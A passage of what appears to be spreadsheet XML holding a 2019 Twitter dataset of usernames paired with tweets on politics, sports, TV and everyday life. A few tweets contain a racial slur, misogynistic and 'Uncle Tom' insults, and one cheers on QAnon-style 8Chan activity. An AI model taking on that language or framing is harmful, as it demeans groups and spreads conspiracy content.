    <t>@NavyCaptRet63XX @Elliott83583572 @Unfreakin @realDonaldTrump What idiot strips funding from the military for a useless wall when he’s creating a situation with Iran 🇮🇷 and allowing North Korea 🇰🇵 to go unchecked? Never mind.</t>
  </si>
  <si>
    <t>VisitSavannah</t>
  </si>
  <si>
    <t>The only thing better than visiting Savannah is living here: https://t.co/NqMcogb9vp https://t.co/zwvclTqcQl</t>
  </si>
  <si>
    <t>MaddKingMaddox</t>
  </si>
  <si>
    <t>@Edgyarmo @BluefinBrands Congrats you big fella! You’ve put a lot of work in for it.</t>
  </si>
  <si>
    <t>rossdembecki</t>
  </si>
  <si>
    <t>Interview: @FireEye Cloud CTO Martin Holste on the Future of Security in the Cloud. Watch Martin share his thoughts in a quick interview at AWS Public Sector Summit. https://t.co/XzvQZNGbmj</t>
  </si>
  <si>
    <t>DMonHTX</t>
  </si>
  <si>
    <t>@DoctorDRM_Art Sweer, Inko's winning the poll! https://t.co/uHZ06OJ21H</t>
  </si>
  <si>
    <t>SouthernDiva71</t>
  </si>
  <si>
    <t>You open figurative doorways as well as literal ones. You may ... More for Capricorn https://t.co/x3pBXwo37R</t>
  </si>
  <si>
    <t>kimberlyyharbyy</t>
  </si>
  <si>
    <t>@MikeyCobban you &amp; @ItsLeeHinchy &amp; all the social climbers</t>
  </si>
  <si>
    <t>AliciaFixLuke</t>
  </si>
  <si>
    <t>Isn't this the guy who got booed by his constituents when he announced he was running for President? https://t.co/c7I6zNdx8n</t>
  </si>
  <si>
    <t>MsAivyMichelle</t>
  </si>
  <si>
    <t>Bro I’m over here mindin my business and I look over at my mom and she’s lookin at strippers shakin ass on each other on her phone. What the 😂</t>
  </si>
  <si>
    <t>jumexdepeach</t>
  </si>
  <si>
    <t>i thank god for my high n big cheekbones</t>
  </si>
  <si>
    <t>notabeanie</t>
  </si>
  <si>
    <t>@FeelingEuphoric Tell us what anime movie please we deserve to know</t>
  </si>
  <si>
    <t>kirkdando</t>
  </si>
  <si>
    <t>Can you REALLY hold employees accountable AND empower them at the same time? Learn how the Redbox Founder, Gregg Kaplan did exactly that: https://t.co/LNbik1U5ke</t>
  </si>
  <si>
    <t>ubiquitymme</t>
  </si>
  <si>
    <t>Yankees devour Twins and now look to put the Red Sox away.. https://t.co/WDrKxOCjTO</t>
  </si>
  <si>
    <t>Paperkinscrafts</t>
  </si>
  <si>
    <t>Good afternoon #ArtisanAfternoonTea ill be your host today! How is everyone fairing in the warm weather! https://t.co/RZO47eBdqC</t>
  </si>
  <si>
    <t>benjamin_bill</t>
  </si>
  <si>
    <t>I’ve spent the last 40 minutes watching The Bachelorette with my wife... easily the worst 40 minutes of my life and summer vacation that I’ve wasted away.</t>
  </si>
  <si>
    <t>Rissaa1217</t>
  </si>
  <si>
    <t>Cleaning day for me 😒 or should I say everyday is cleaning day 😩</t>
  </si>
  <si>
    <t>nadabakos</t>
  </si>
  <si>
    <t>@KrisGoldsmith85 @Lkatzenberg I don't know whether I should laugh or be mad on behalf of @Lkatzenberg - (I'm both, to be clear)</t>
  </si>
  <si>
    <t>aimee_carter</t>
  </si>
  <si>
    <t>@theawkwardyeti Awesome, thank you! Yeah, pages are hit and miss. Looking forward to decent information.</t>
  </si>
  <si>
    <t>FLEETCentre</t>
  </si>
  <si>
    <t>Why spintronics? A bit of relatively simple maths explains why adding two extra degrees of freedom massively increases computing power https://t.co/RuZfRlxIy4 With thanks to @CarlosKuhn15 &amp; @CaboAntonija https://t.co/Qi99E39ATN</t>
  </si>
  <si>
    <t>AAJASanDiego</t>
  </si>
  <si>
    <t>EVER BEEN INSIDE OF A TELEVISION STATION? Join us at #NBC7 for our 33rd Anniversary w @NBCLA’s @HettyNBCLA &amp; @FOXLA’s @SandraEndoTV! Come celebrate on Sat, Sept. 28 @ 2-4PM for networking, studio tours, headshots, raffle prizes, food &amp; more! GET TIX: https://t.co/tMomhtFVXS https://t.co/axFcMjzJnY</t>
  </si>
  <si>
    <t>TimberPuppers</t>
  </si>
  <si>
    <t>Prednisone is a hell medicine, I have nothing but sympathy for anybody who has to be on this shit long-term. x.x</t>
  </si>
  <si>
    <t>BetsyLeifeste</t>
  </si>
  <si>
    <t>@cheerwhine1 @vegasexpats @Franklin_Graham What does Franklin need to call Trump out FOR? That he’s a sinner- a man with flaws? Imperfect? Trump is doing a FANTASTIC job. Thank the Good Lord for him.</t>
  </si>
  <si>
    <t>poopwilsonttv</t>
  </si>
  <si>
    <t>Hope your Monday has been awesome! My killer gameplay will be mediocre and my survivor gameplay will be submeocre #DeadbyDaylight</t>
  </si>
  <si>
    <t>Cindtrillella</t>
  </si>
  <si>
    <t>That’s right. Scope this nigga the fuck OUT Franklin! #SnowfallFX</t>
  </si>
  <si>
    <t>DarbyMurphy64</t>
  </si>
  <si>
    <t>@SpottyBeagle We are so happy you like it ! Now have a seat and remember all the funny things that Marigold did to put a smile on your face. We know she will be sitting right beside you ❤️🌈</t>
  </si>
  <si>
    <t>LifeCubs4</t>
  </si>
  <si>
    <t>@Cubs @NBCSChicago Good Lineup. I like it. Schwarber is so much better down in the order. Makes it much deeper. Let's get a W</t>
  </si>
  <si>
    <t>CentaurShadow</t>
  </si>
  <si>
    <t>@acnewsitics @realDonaldTrump Pure bullshit and you know it, Uncle Tom.</t>
  </si>
  <si>
    <t>Youknowmebyross</t>
  </si>
  <si>
    <t>Don’t have to tell me twice bum ✌🏾</t>
  </si>
  <si>
    <t>kyledowns1</t>
  </si>
  <si>
    <t>@fugexlac @ChicagoFire I bet they don’t even announce ticket prices, but ask for the $50 deposit</t>
  </si>
  <si>
    <t>iTrap4TheHokage</t>
  </si>
  <si>
    <t>@synthgirI Yeah unfortunately he committed suicide. Super funny dude and talented streamer</t>
  </si>
  <si>
    <t>_gxna_</t>
  </si>
  <si>
    <t>Can’t wait for you to fully appreciate that I’m here ☺️</t>
  </si>
  <si>
    <t>jamesvaldezjr</t>
  </si>
  <si>
    <t>It’s almost the weekend!!!!!</t>
  </si>
  <si>
    <t>chicagoexpatjy</t>
  </si>
  <si>
    <t>@Aaron__Burch Same here, but I'm reading to minimize the guilt.</t>
  </si>
  <si>
    <t>baerga20</t>
  </si>
  <si>
    <t>@Kota_H11 @mat_singleton @NiceDeb @brhodes Do you realize that East Jerusalem—all of it—is occupied land under international law? What the Israeli Supreme Court has to say about it has no weight on the issue.</t>
  </si>
  <si>
    <t>CarolineHoene</t>
  </si>
  <si>
    <t>Do I want to get my nipples pierced or do I just want more attention???? #LeoSzn</t>
  </si>
  <si>
    <t>KenzieBrtls</t>
  </si>
  <si>
    <t>@RobPlays I love how your videos are getting more and more niche. I want to see the upper limit to how niche you can go.</t>
  </si>
  <si>
    <t>willwhite131</t>
  </si>
  <si>
    <t>If anyone wants two tickets to .@GCWrestling_ tonight let me know . Can not make it due to family emergency</t>
  </si>
  <si>
    <t>amarismoon</t>
  </si>
  <si>
    <t>@TanjaStrutzl @Allegratastic @Lornesgoldhair @JaredHarris I'm writing one but it isn't a comedy. At least he would get the girl and be alive at the end... JUST SAYING.</t>
  </si>
  <si>
    <t>PrettyFlacco94</t>
  </si>
  <si>
    <t>Why are you making plans against the Lord? He will bring complete destruction, so you will not caus… https://t.co/Vi1djkhA3W</t>
  </si>
  <si>
    <t>312BreakingNews</t>
  </si>
  <si>
    <t>@EmilyRNunn Had no idea you were battling this, I'm so sorry. Not that my struggle with pain is comparable in any way, but I also recently learned this ^ lesson. I wrote about taking strong rx opioids in the Trib and was sure I'd be skewered (hate mail). Instead I got 300 supportive emails.</t>
  </si>
  <si>
    <t>wildcraftedorg</t>
  </si>
  <si>
    <t>WILD BERRY @justaskarjun ________________________________________________ . What Masque are you using this weekend Beauties? . It’s so important to keep pores clean and refined with a weekly masque RITUAL. My tip… https://t.co/YvvkorYlfH</t>
  </si>
  <si>
    <t>maria_sedecrem</t>
  </si>
  <si>
    <t>it's really sad that the friendship we made it's over #DonKiss sayang tag</t>
  </si>
  <si>
    <t>Trapiss13</t>
  </si>
  <si>
    <t>It’s so amazing how hungry some of you mfs are for clout 🤦🏽‍♂️</t>
  </si>
  <si>
    <t>burkard20</t>
  </si>
  <si>
    <t>@Jaberuski Rare to medium is a stretch. I usually go Med Rare so Medium is okay as long as it’s juicy</t>
  </si>
  <si>
    <t>plzbepatient</t>
  </si>
  <si>
    <t>@RealAlisonPoole *gets shot doing so* Guns are the problem!!!!!</t>
  </si>
  <si>
    <t>zeeshan_shah_dc</t>
  </si>
  <si>
    <t>@mathieuvonrohr This is in the Pakistani Ambassador’s residence if I’m not mistaken.</t>
  </si>
  <si>
    <t>MichelleG20avon</t>
  </si>
  <si>
    <t>@McBookie do you still do betting for Scottish junior football? Can’t see anything on the site</t>
  </si>
  <si>
    <t>pickwick</t>
  </si>
  <si>
    <t>this tweet proximately inspired by the Fringe, which is now so big it's legitimately terrible and you have to go to the fringe fringes for anything decent, but yeah. EVERYTHING.</t>
  </si>
  <si>
    <t>lakeparkbistro</t>
  </si>
  <si>
    <t>Join us on Saturday, August 3 for our 9th Annual Pig Roast! Enjoy whole hogs, slowly roasted over an open flame, and a variety of delicious sides served buffet style on the beautiful lawn outside Lake Park Bistro from 12 - 3 PM. Purchase your tickets: https://t.co/79CjrI4rK1 https://t.co/4RIMeZOSBl</t>
  </si>
  <si>
    <t>TamifayeMSVP</t>
  </si>
  <si>
    <t>@PeppielouMSVP @DivaDonnaMSVP @Citywide45 @Kim2Kim1 Off to work. Thursday off and I have a new book... lol I will be reading it in one sitting Im sure LOL</t>
  </si>
  <si>
    <t>Lynnund99999999</t>
  </si>
  <si>
    <t>@24talk @realDonaldTrump I reported it. We need to start reporting his tweets.</t>
  </si>
  <si>
    <t>hoppituna</t>
  </si>
  <si>
    <t>My coworker has been coming in every day this week and telling us shark facts Bc he watches shark week every day after work and today we found out shark week starts next week and we don’t know what he’s been watching that there has been shark content after work every day</t>
  </si>
  <si>
    <t>esabine1980</t>
  </si>
  <si>
    <t>@taylorr301 @BleacherReport Nope. He's absolved due both fighters willfully agreeing to compete.</t>
  </si>
  <si>
    <t>james_clouting</t>
  </si>
  <si>
    <t>@Independent How dare he spell out all her failures and misery she's caused. What a disgrace.</t>
  </si>
  <si>
    <t>WallerLegal</t>
  </si>
  <si>
    <t>@radiophonicpop @TalentedEukarya @questauthority @KathrynTewson @JosephCaruth @HaygoodLaw @JeffreyAWilson @Liquidzer0 @LawCatDad @ZeroResurrected @NickRekieta @ThatUmbrella @karhifer @Animeology_ @greg_doucette @_Hero_Hei_ You’re new to the Internet, aren’t you? People still believe Pizzagate.</t>
  </si>
  <si>
    <t>bookwalee</t>
  </si>
  <si>
    <t>@RL_Maizes Congratulations!! Excited to read!</t>
  </si>
  <si>
    <t>bigant604</t>
  </si>
  <si>
    <t>@JackPosobiec I’m looking at Yankee and Arizona baseball game</t>
  </si>
  <si>
    <t>armandthevoice</t>
  </si>
  <si>
    <t>FACT: WENDY WILLIAMS Inside the Quiet Storm with Armand! https://t.co/gEmBNfyzDT</t>
  </si>
  <si>
    <t>SignHimUp1878</t>
  </si>
  <si>
    <t>@charles_stevo Charles state the obvious Stevenson strikes again. Cheers for the insight mate 👍</t>
  </si>
  <si>
    <t>TionnaRDNK69</t>
  </si>
  <si>
    <t>I just got woke up from my nap by Tyson walkin through my door with Costa Vida, my heart😭😭❤️</t>
  </si>
  <si>
    <t>toddwhite21</t>
  </si>
  <si>
    <t>@girlsreallyrule #MoscowMitchTraitor is up a creek with no paddle</t>
  </si>
  <si>
    <t>urbvnwave</t>
  </si>
  <si>
    <t>@soradubz I KNOW and the fact that i know have these ones replace em is both the best and worst thing</t>
  </si>
  <si>
    <t>LawlorKelly</t>
  </si>
  <si>
    <t>Listening to the rain early morning &gt;&gt;&gt;</t>
  </si>
  <si>
    <t>ChadSimmons_</t>
  </si>
  <si>
    <t>.@rivalsmike &amp; @adamgorney select their @Rivals' all-time two-star (and no-star) team: https://t.co/yEjLho2R4P</t>
  </si>
  <si>
    <t>Palmolive_S_Pan</t>
  </si>
  <si>
    <t>@bunnyt1960 @Pryncess_2009 @sharon_cantley @Lpowell588Lady @DonnaLeeThomps8 @madridnantes @Kathlee54272830 @ToughGuyMankas @1gingerbeauty @DrChales @Sweetdr17415074 @VitCza @catsrule0 @BloomNight2 @pukipie @lynda3035 @marisbellamy1 @MissytheB @deborah26449389 @badgerdastaffy @SomoraRocks @mhmelbourne @luvthebeachdd @kimmies_kitties @vroberts9 @AngusMcPussPuss @Tonithecat32 @cwniteowl @keepupwithjen @Fuxinchen @Marielincoln10 @duchess_meow @fluffybasil @WilliamTheGinge @DylantheCaptai1 @BlindPebbles @Sherlockdacat @MarsRoverCat @oreokittykat @6327carole @MoetBlindCat @ManfredCat @SoxandD @LittleMaineCoon @GordonHarmony @Miss_Phoebe_Lee @SassyCassyCat @CatPuds @JoyOfCats @3JazzCats Good morning,Bunny.We're very fortunate to have a mom who has worked with cats in her career to help us when our beloved furbabies are not well. Whether it be a big or small issue, you are here to give council and reassurance.Thank you! Be well and have a fun and peaceful day! 💐</t>
  </si>
  <si>
    <t>hotgirlkiaaa</t>
  </si>
  <si>
    <t>Bae: you can come to bed🙈😜👅</t>
  </si>
  <si>
    <t>JayneIgoe</t>
  </si>
  <si>
    <t>@Mario_Falcone Aww she's clearly trying to get a newspaper interview ££££. Sad really!</t>
  </si>
  <si>
    <t>PatCoyle17</t>
  </si>
  <si>
    <t>@WhoppiGoldberg0Check this out--------https://t.co/ewL3Kerwf1 I am a disabled award-winning portrait, pet and nature photographer residing in, Pennsylvania. Please take a look and share the site with friends.</t>
  </si>
  <si>
    <t>morrell_geri</t>
  </si>
  <si>
    <t>@MatthewParris3 was deeply unpleasant and vindictive about @BorisJohnson in interview on @BBCWorldatOne .Parris complains the UK is divided but can’t see that he &amp; others like him are contributing towards it by using character assassination as an argument. Boris never does this!</t>
  </si>
  <si>
    <t>VetsInTech</t>
  </si>
  <si>
    <t>Join VetsinTech for an exciting veteran pitch event and founder workshops hosted by Majestyk Apps!! Register here: https://t.co/GHamdRBNlp Refreshments will be served!! #nyc #newyork #vets https://t.co/Sp4eBQdzE0</t>
  </si>
  <si>
    <t>NewtonNews1</t>
  </si>
  <si>
    <t>Team Warrior Raise £1000 for MND Association After raising £1000 for the Mara Unit at their last Charity Fight Night, Team Warrior decided to host another one, with the nominated ... - https://t.co/Z4R40WeUCe #newtonnews https://t.co/33uWfmY1S7</t>
  </si>
  <si>
    <t>sobflomike</t>
  </si>
  <si>
    <t>What the flowers, not the weeds. Let’s better understand student behavior. #DunkirkLearns</t>
  </si>
  <si>
    <t>007Prajapa</t>
  </si>
  <si>
    <t>@vivekagnihotri pranam london,uk make movie mohmad u become hero promote secular bharat see what happen....all comes on road hindu sleep he die this is good thing in hinduism make movie on kavi kalidas......patanjali...kanishka the great...buddhism....mahaveer....</t>
  </si>
  <si>
    <t>kcyalater_</t>
  </si>
  <si>
    <t>Tw: weight My dietitian told me Ive lost quite a bit of weight recently and Im gonna have some kinda time making sure my #eatingdisorder doesnt just sprint with that</t>
  </si>
  <si>
    <t>poeticpotion111</t>
  </si>
  <si>
    <t>@realDonaldTrump Antifa IS a terrorist group who wear masks, hit unsuspecting victims with bats. They have no good message to send except that they are a violent mob. They MUST be stopped once and for all. @foxnews</t>
  </si>
  <si>
    <t>superscriber</t>
  </si>
  <si>
    <t>@FrankHampster @mirandadevine How can you claim to know someone‘slightly’ then base your whole argument on that oh-so tenuous link?</t>
  </si>
  <si>
    <t>HollyOaks007</t>
  </si>
  <si>
    <t>Pleaseeeeee @TheTweetOfGod make it rain in the UK I can’t deal with this heat at night! Thanks x</t>
  </si>
  <si>
    <t>ricosleaz</t>
  </si>
  <si>
    <t>Ugly bitches the boldest</t>
  </si>
  <si>
    <t>AAAJ_AAJC</t>
  </si>
  <si>
    <t>Bruce Lee is re-introduced to audiences in "Once Upon A Time in Hollywood." https://t.co/UwJbQYavOQ</t>
  </si>
  <si>
    <t>illmatic1802</t>
  </si>
  <si>
    <t>@Willo290592 @ifly_coach @Stadium Can't wait to play the failcons lol https://t.co/BV9HloFyM7</t>
  </si>
  <si>
    <t>nasty_canasta</t>
  </si>
  <si>
    <t>My latest knife. Commissioned just now from fellow Prescottonian and bad ass blade builder Ryan Schreiber of Royal Shanks Knives. This profile and hamon, with the Arizona Ironwood scales in the red circle. 👍🏻👍🏻👍🏻 Now I wait... https://t.co/DCFIqjrlIs</t>
  </si>
  <si>
    <t>StevijoPayne</t>
  </si>
  <si>
    <t>Mongo go to bed now.</t>
  </si>
  <si>
    <t>roxytheefendog</t>
  </si>
  <si>
    <t>@_Kenziepuff In 18 months I will survive because I was taught how to live off the land. You will not because you believe in this shit</t>
  </si>
  <si>
    <t>gord93</t>
  </si>
  <si>
    <t>@LeBatardShow THAT'S OUR MAN SECURE THE BAG</t>
  </si>
  <si>
    <t>CHRIS_MAGA_KAG</t>
  </si>
  <si>
    <t>@RepRashida, @RashidaTlaib Can you please explain why a member of US Congress would ask for compassion for ILLEGAL ALIEN terrorists, and, why you were disrespectful to @POTUS, @realDonaldTrump (cc: @Liz_Wheeler) https://t.co/66eS4OsTqC</t>
  </si>
  <si>
    <t>MikeMinogue18</t>
  </si>
  <si>
    <t>@LoverOfTroops barry, thank you for the laugh.</t>
  </si>
  <si>
    <t>rightmove</t>
  </si>
  <si>
    <t>@Dervheid Hi Brian. Thank you for taking the time to make us aware of this. We will ask our legal team to look into this further. Many thanks, Bobbie :)</t>
  </si>
  <si>
    <t>jazzzhand</t>
  </si>
  <si>
    <t>@ohnowahlson I walk my dog up there. It could have happened!</t>
  </si>
  <si>
    <t>blindphases</t>
  </si>
  <si>
    <t>i just cried watching remember the titans for the 500th time</t>
  </si>
  <si>
    <t>anglophilehoo</t>
  </si>
  <si>
    <t>Watching the final stage of #TDF2019 w/the usual mix of emotions. @LeTour is at the same time one of the most extraordinary sporting events in the world and the best advertisement imaginable for France. After 3 weeks, I miss it very much when it’s over. #ViveLeTour #ViveLaFrance</t>
  </si>
  <si>
    <t>Glacidon</t>
  </si>
  <si>
    <t>@ylissetwink @ylisseantactics Near the start of the game there are other gatekeepers to keep you from exploring the monastery fully, sweet gatekeeper is the only one that stays there the entire game that you can talk to.</t>
  </si>
  <si>
    <t>notivacilon</t>
  </si>
  <si>
    <t>The President Love is to Sweet. And Poor Folks Are Diabetics 😫⚰🍆💦 #breaking #godblessthemotherland</t>
  </si>
  <si>
    <t>Sports2NiteTV</t>
  </si>
  <si>
    <t>You can't score touchdowns without receivers! Tonight on @Sports2NiteTV we're discussing all things WR's. Tune in to @kcwxtv at 5:30 pm for the latest from @dallascowboys training camp! https://t.co/BBAm0ObQYc</t>
  </si>
  <si>
    <t>tris_10_</t>
  </si>
  <si>
    <t>Got something super cool to add to my photography/ videography gear today!! So excited to pick it up next week! 😍 #dji</t>
  </si>
  <si>
    <t>KeMPLiNGS123</t>
  </si>
  <si>
    <t>@DonaldJTrumpJr @replouiegohmert “smirks unhappily”? Did he also laugh angrily? Whisper yellingly? Happy sadly? Oxymoron agreeably? You are seriously too stupid to function (that was also in the Meuller, Mueller, Muller report). Since “pappy” loves McDs so much, just go with “grimace” next time. #thesaurus</t>
  </si>
  <si>
    <t>InfoAffair</t>
  </si>
  <si>
    <t>Good Morning And Happy Sunday to everyone reading this. I’ll be kick starting my #diet this week. This morning #Breakfast is commencing with Grapefruit, Eggs and Black Coffee Any lunch suggestions? #healthyesting #DietPlans #weightloss #SundayMorning https://t.co/WjwNHpLoWj</t>
  </si>
  <si>
    <t>HealthierLive</t>
  </si>
  <si>
    <t>Great session with welsh no. 1 junior player Ciara with @sqwales at the new junior holiday provision. At @Better_Cardiff Pentwyn and later at Eastern #squash #sportcardiff https://t.co/MUZ4GtDXSa</t>
  </si>
  <si>
    <t>cityofkingston</t>
  </si>
  <si>
    <t>@KarenRe33720328 Hi Karen, Thank you for letting us know. In order to submit a service request we will require more information regarding the location. Can you please send us a direct message with your contact information and more detail? You can also give us a call at 613-546-0000.</t>
  </si>
  <si>
    <t>gbrading</t>
  </si>
  <si>
    <t>A variety of polls will show in the near future the Tories taking a big lead (as they eat the Brexit Party vote). It is critical to not be disheartened by these polls. This is what happened in winter 2016/17. Yet in the end, the 2017 GE happened.</t>
  </si>
  <si>
    <t>BrunswickXing</t>
  </si>
  <si>
    <t>Our state-of-the-art #Community pool is just the spot for the whole family to enjoy a #Summer day. 🕶️ Check out our list of fun activities your family can do while you're there: https://t.co/YG8mc9Uj0K</t>
  </si>
  <si>
    <t>ccristovao1864</t>
  </si>
  <si>
    <t>@PlayFulLoveProd @arietalp Exactly!! Gabi went through hell. You can make a good case for PTSD. And it’s absolutely true, she’ll only forgive who she wants to forgive. I’m still convinced she only forgave Claire in order not to look bad since the family wasn’t turning on her 😂 remember the dirty looks 😒</t>
  </si>
  <si>
    <t>tyronewinks</t>
  </si>
  <si>
    <t>@__roxyyy @cherkaneprosper I’ve got a ticket for sale if you still need one</t>
  </si>
  <si>
    <t>dnlltylr</t>
  </si>
  <si>
    <t>Tom Hanks is everything that is right in this world and I love him with all of my heart okayyyy</t>
  </si>
  <si>
    <t>kuwabaratotechi</t>
  </si>
  <si>
    <t>my time off for @thepenumbrapod live event got approved!!!!! i can't wait!! im going with family for my dad's birthday, as he is an infamous jupeter stan</t>
  </si>
  <si>
    <t>CamCronkright</t>
  </si>
  <si>
    <t>S&amp;P 500 and Nasdaq Composite hit all-time intraday highs https://t.co/ZIpDAvvWIs</t>
  </si>
  <si>
    <t>BlkHistStudies</t>
  </si>
  <si>
    <t>Last tour for 2019! Don't miss our 'Maafa Tour - Liverpool' on Saturday 31st August 2019 which includes guided #BlackHistory Tour of the International Slavery Museum and #Liverpool #WalkingTour. Places are limited! Secure your place NOW! https://t.co/9FpnCjmJPb BOOK NOW! https://t.co/oZY2rtanlg</t>
  </si>
  <si>
    <t>EvanSernoffsky</t>
  </si>
  <si>
    <t>Search of Nevada home of gunman in #GilroyGarlicFestivalShooting turned up bullets, gas mask, bullet proof vest, empty Valium bottle &amp; mysterious letter from “Virginia to Santino” https://t.co/1mtC52Yubc</t>
  </si>
  <si>
    <t>GFSuperTrooper</t>
  </si>
  <si>
    <t>What in the actual fruck is going on???!!! #bachelorette #BachelorNation @TylerJCameron3 #jipped</t>
  </si>
  <si>
    <t>SaskLass</t>
  </si>
  <si>
    <t>@SynSub @Mistybai @realDonaldTrump I have never heard of any western laws where criminals were mutilated. We will agree to disagree. End of discussion</t>
  </si>
  <si>
    <t>npowerhelp</t>
  </si>
  <si>
    <t>@dillysn Hi Sarah, I'm glad to hear about the great service you've received from our metering agent during the Smart installation. :) ^Stephen</t>
  </si>
  <si>
    <t>GSWSyndicate</t>
  </si>
  <si>
    <t>"Every person has to love at least one bad partner in their lives to be truly thankful for the right one." � Unknown</t>
  </si>
  <si>
    <t>DarrynBoodan</t>
  </si>
  <si>
    <t>This is good to hear https://t.co/CyW2RaZQe8</t>
  </si>
  <si>
    <t>donniejonesjr</t>
  </si>
  <si>
    <t>@Tigerbill @WKRG It’s clearly a states right for them to do whatever they want to do.</t>
  </si>
  <si>
    <t>RSMedSpa</t>
  </si>
  <si>
    <t>If you're going to schedule an appointment, now is the time! https://t.co/wmpoQ6rWVZ https://t.co/tWGHVvTj3D</t>
  </si>
  <si>
    <t>CdnOrthoAssoc</t>
  </si>
  <si>
    <t>We ❤️ featuring work done by our #orthopaedic community! The Pediatric &amp; Adolescent Hip: Essentials &amp; Evidence, co-editors Sattar Alshryda, Jason Howard, Jim Huntley, Jonathan Schoenecker (original medical art). See TOC for COA authors incl @DDHregistry: https://t.co/XL9qbLMz4E https://t.co/giUgyG0ES0</t>
  </si>
  <si>
    <t>brettkavanagh</t>
  </si>
  <si>
    <t>How digital is changing the automotive customer experience https://t.co/rQsusL7Ozb</t>
  </si>
  <si>
    <t>JesWrites</t>
  </si>
  <si>
    <t>@NotLikeFreddy The correct and most thorough answer</t>
  </si>
  <si>
    <t>HenryBull10</t>
  </si>
  <si>
    <t>To support them could RFA dilligence be reactivated short term (whilst a new ship conversion was being organised) ... this would allow week long crew rotations and resupply for the boats thus extending their time on station 2/3</t>
  </si>
  <si>
    <t>Eorme1Ed</t>
  </si>
  <si>
    <t>@JoyLinPark @THeinrich22 @Maga45T That is Sharpton's claim to relevance, though he has not done anything for minorities for several decades. He has created his own lifetime gravy train.</t>
  </si>
  <si>
    <t>JTBEMD</t>
  </si>
  <si>
    <t>@wbaltv11 Planned Parenthood doesn't consider that baby to be a person.</t>
  </si>
  <si>
    <t>Brykissyfur</t>
  </si>
  <si>
    <t>@SkyNewsBreak Stating the obvious we cannot go back to that</t>
  </si>
  <si>
    <t>CalvanoRobert</t>
  </si>
  <si>
    <t>@EllaSterling85 @seanhannity They are being illegally detained and deported, but you already knew that.</t>
  </si>
  <si>
    <t>OfficialECM</t>
  </si>
  <si>
    <t>@penathe1nonly @Mngment1 @Dalirocksursox @IllKingKilla @SorreyTV @judelas @HellzGatesOSRS @judelas confirm. Please do confirm how @HellzGatesOSRS said this was a great idea, said I could do it and make a thread, and you continued to shut it down in a community that wasn’t yours to run since @HellzGatesOSRS is supposedly the “leader”?</t>
  </si>
  <si>
    <t>TheObbster</t>
  </si>
  <si>
    <t>Okay so just about number 1 for me. I adored Ragnarok. I love Taika’s work. A little worried about if Hemsworth will be replaced but I gather they’ll both be kicking ass with Valkeryie and Korg and maybe Beta Ray Bill??.. it’s gonna be great and I just can’t wait. Ends Phase 4. https://t.co/ssLyZutwKw</t>
  </si>
  <si>
    <t>keenevision</t>
  </si>
  <si>
    <t>Well, there goes your “strong economy” over the long term. Does anyonelook long term anymore? https://t.co/3KayHFxIe6</t>
  </si>
  <si>
    <t>hardlybasic</t>
  </si>
  <si>
    <t>@Nadiagotzskillz You aren’t going to change Ted Cruz’s mind, acting like a Psychopath. It’s called voting. Vote. Donate. Give your money to people and organizations that do make changes. Like @ACLU It’s called teaching our children compassion kindness gratitude and love...</t>
  </si>
  <si>
    <t>swampspice</t>
  </si>
  <si>
    <t>@cfree94 What episode of The Office is this from?</t>
  </si>
  <si>
    <t>FansnStars</t>
  </si>
  <si>
    <t>Why Sebastian Stan Didn't Even Want Bucky To Be The Next Captain America https://t.co/DLZJEe1k00 https://t.co/Eran3teyvV</t>
  </si>
  <si>
    <t>raeshotdat</t>
  </si>
  <si>
    <t>Everyday is starting to be a work day.. and I love it 💪🏽📸</t>
  </si>
  <si>
    <t>LaughingManPro</t>
  </si>
  <si>
    <t>@kennwickman @byHeatherLong @gtconway3d 2022 will be the new 2008 and it might be worse.</t>
  </si>
  <si>
    <t>pixeldudle</t>
  </si>
  <si>
    <t>@YourTypicalOsu SOFT AND LOVEABLE BECAUSE IM LOVE UOU</t>
  </si>
  <si>
    <t>Deltaco27</t>
  </si>
  <si>
    <t>Guy in the crew room is telling a story about how he ran away from his parents when he was 5 at magic kingdom and went under the parade float to go ride the tea cups https://t.co/3b8hdXVW9O</t>
  </si>
  <si>
    <t>coll61490833</t>
  </si>
  <si>
    <t>@SueCFlorida @CodeMonkeyZ Almost a year later from this tweet, and hundreds of thousands more have learned how to maneuver the 8Chan boards. Just amazing, and wonderful, and I’m so so thankful.👍🏻🕶🇺🇸</t>
  </si>
  <si>
    <t>CigarGuy83</t>
  </si>
  <si>
    <t>#Podcast #Roundtable @drewestatecigar #NicaRustica and drink @RondeJeremyRum and #WillFerrell #movies #CigarHerf https://t.co/MNXird0nSs</t>
  </si>
  <si>
    <t>nickeliscu</t>
  </si>
  <si>
    <t>Making the mistake I never learned from</t>
  </si>
  <si>
    <t>redhotnerd</t>
  </si>
  <si>
    <t>@KAP1356 @KDKA Yep. He left the impression that he’s and idiotic clown, that’s for sure.</t>
  </si>
  <si>
    <t>Vrukkus</t>
  </si>
  <si>
    <t>@JarodDuckett I owned this game back in the day, so fun</t>
  </si>
  <si>
    <t>akshayk22</t>
  </si>
  <si>
    <t>@johnscharts I absolutely love the mini trading community you guys have going on in twitter. Happy weekend!</t>
  </si>
  <si>
    <t>MrTabbs</t>
  </si>
  <si>
    <t>With all of this hot weather, have you thought about a short sleeved shirt? Go with a classic collar or go with our Blaise Collar as in the picture. A one piece collar designed to stay open. Smart but allows more… https://t.co/TqqhN0Q1v2</t>
  </si>
  <si>
    <t>lovelynish27</t>
  </si>
  <si>
    <t>I just need to find me a hairstylist close to me for me and mines then I’m good because everybody can not do hair</t>
  </si>
  <si>
    <t>showcasecityon1</t>
  </si>
  <si>
    <t>Lagos-Ibadan Expressway to be shut for 4 months https://t.co/5Vvpks0ibw https://t.co/41doBWFoCr</t>
  </si>
  <si>
    <t>xxHoneyKissesxx</t>
  </si>
  <si>
    <t>Orlando City Council: Stop profit on blood shed - Sign the Petition! https://t.co/gpKB9uUzmB via @Change</t>
  </si>
  <si>
    <t>corstclimaction</t>
  </si>
  <si>
    <t>@JamesMelville @peterbrownbarra The crazy part of this is we cannot actually afford to burn the oil Scotland has. (Or anyone else for that matter). In 10-20yrs oil and political divisions will be the very last of our worries!</t>
  </si>
  <si>
    <t>OmuriceisDelish</t>
  </si>
  <si>
    <t>@future_of_all @asukatwt Damn the grade school insults don't end do they?</t>
  </si>
  <si>
    <t>KoutaKunX</t>
  </si>
  <si>
    <t>@LumiaStorm I love her too if she tries to stab me ill counter attack into something ;3</t>
  </si>
  <si>
    <t>GeigerNews</t>
  </si>
  <si>
    <t>@PattyAnne67 @HouseDemocrats I agree to some extent. The problem is, despite many, many opportunities, he said next to *nothing* on the record. Yes, there were some areas he legitimately could not talk about - but not all. The committee chairs should have been stronger with him.</t>
  </si>
  <si>
    <t>AdamSoucie</t>
  </si>
  <si>
